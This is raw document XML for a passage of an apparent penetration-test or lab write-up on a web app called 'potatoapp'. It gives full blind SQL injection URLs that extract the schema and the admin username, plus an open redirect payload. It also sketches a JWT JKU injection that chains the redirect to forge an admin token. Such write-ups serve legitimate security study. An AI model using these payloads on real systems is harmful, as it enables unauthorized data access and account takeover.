        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f1ysm7kie0eq" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gaining Admin Role Credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ude761hp8mum" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL injection occurs when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_mf6nr1bs59i9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.4.1. - Blind SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In potatoapp/app.py we can see that the /potato_database endpoint calls the get_potatoes_data function. In the get_potatoes_data function, we can see that it makes an SQL query to get data from the database. The order_by clause is using user input and not a parameterized query.` The value for the order_by clause is taken from the filter parameter. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> By employing a payload like the one below, we can extract the table name and column name character by character:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>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0" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">https://18.141.13.209/potato_database?search=&amp;filter=(CASE+WHEN+(SELECT+hex(substr(sql,1,1))+FROM+sqlite_master+WHERE+type=%27table%27+and+tbl_name+not+like+%27sqlite_%%27+limit+1+offset+1)+=+hex(%27u%27)+THEN+price+ELSE+origin+END</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Running the script will show the table name and columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="216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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once we have obtained the table name and column name, we can utilize a payload such as the following to extract the admin username from the database:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>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0" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">https://18.141.13.209/potato_database?search=&amp;filter=(CASE+WHEN+(SELECT+hex(substr(username,1,1))+FROM+users+limit+1+offset+1)+=+hex(%27p%27)+THEN+price+ELSE+origin+END)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1z12pnhe6ecm" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Redirect</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Redirect is a vulnerability where the web application redirects without validating the URL that it redirects.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the "potatoapp/app.py" file, it is evident that in the promotion route, the application redirects to the value specified in the URL parameter without implementing any validation or checks.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is possible to exploit this using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://18.141.13.209/promotion?url=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;any link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="1104900"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="17" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="5310" l="1122" r="2724" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1104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2">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o9fd92z44nos" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT JKU injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems. They are most commonly used to send information ("claims") about users as part of authentication, session handling, and access control mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "JKU" (JWK Set URL) header is a parameter used to reference a JWK Set that contains the necessary cryptographic key for verifying the signature. During the signature verification process, the server retrieves the appropriate key from the URL specified in the "JKU" header.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="144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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_9s6gpwk1mcf3">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.4.3. - JWT JKU injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoding the JWT cookie, we can see that it uses the RS256 algorithm and has the JKU header. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To exploit this, we would need to generate an RSA key in JWKS format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Next we would need to host this key on a publicly accessible URL and modify the JKU and kid headers as well as the username in the JWT cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> In "potatoapp/app.py," a check requires the JKU URL to begin with "https://18.141.13.209." To exploit this, we leverage an open redirect vulnerability by altering the JKU URL value to "https://18.141.13.209/promotion?url=http://&lt;attacker-url&gt;," redirecting to the attacker's URL. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subsequently, by modifying JKU and kid headers and the username, we sign the token with the private key to obtain a legitimate JWT cookie, effectively granting admin access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="4238625"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="18" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
